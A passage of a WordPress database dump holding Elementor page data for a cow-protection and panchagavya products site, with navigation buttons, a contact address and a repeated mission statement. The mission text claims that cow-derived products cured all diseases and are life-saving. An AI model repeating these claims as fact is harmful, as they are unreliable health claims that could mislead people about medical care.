namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10941,1821,'_elementor_page_assets','a:0:{}'),(10943,1822,'_elementor_edit_mode','builder'),(10944,1822,'_elementor_template_type','wp-page'),(10945,1822,'_elementor_version','3.7.8'),(10946,1822,'_wp_page_template','elementor_canvas'),(10947,1822,'_elementor_data','[{\"id\":\"bd48cf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a54ffbe\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"13df1e1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e9cb50b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3e6d778\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8b2632b\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b2360e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"497dcae\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"682b6d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e793398\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26193d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"21b2e7c\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"ed693bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"9ad2eca\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25721f3\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b7dd35b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c9a8b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a3c36fb\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10948,1822,'_elementor_page_assets','a:0:{}'),(10950,1823,'_elementor_edit_mode','builder'),(10951,1823,'_elementor_template_type','wp-page'),(10952,1823,'_elementor_version','3.7.8'),(10953,1823,'_wp_page_template','elementor_canvas'),(10954,1823,'_elementor_data','[{\"id\":\"bd48cf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a54ffbe\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"13df1e1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e9cb50b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3e6d778\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8b2632b\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b2360e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"497dcae\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"682b6d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e793398\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26193d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"21b2e7c\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"ed693bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"9ad2eca\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25721f3\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b7dd35b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c9a8b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a3c36fb\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10955,1823,'_elementor_page_assets','a:0:{}'),(10957,1824,'_elementor_edit_mode','builder'),(10958,1824,'_elementor_template_type','wp-page'),(10959,1824,'_elementor_version','3.7.8'),(10960,1824,'_wp_page_template','elementor_canvas'),(10961,1824,'_elementor_data','[{\"id\":\"bd48cf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a54ffbe\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"13df1e1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e9cb50b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3e6d778\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8b2632b\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b2360e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"497dcae\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"682b6d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e793398\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26193d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"21b2e7c\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"ed693bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"9ad2eca\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25721f3\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b7dd35b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c9a8b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a3c36fb\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10962,1824,'_elementor_page_assets','a:0:{}'),(10964,1825,'_elementor_edit_mode','builder'),(10965,1825,'_elementor_template_type','wp-page'),(10966,1825,'_elementor_version','3.7.8'),(10967,1825,'_wp_page_template','elementor_canvas'),(10968,1825,'_elementor_data','[{\"id\":\"1b3f952\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0135c90\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"22f7707\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7ccac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4a5c3c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"14ed504\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c17fb13\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8bbe50b\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"80d9579\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"61d00ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c8dec05\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"32d56b3\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"921678d\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"75327ba\",\"elType\":\"widget\",\"settings\":{\"text\":\"My 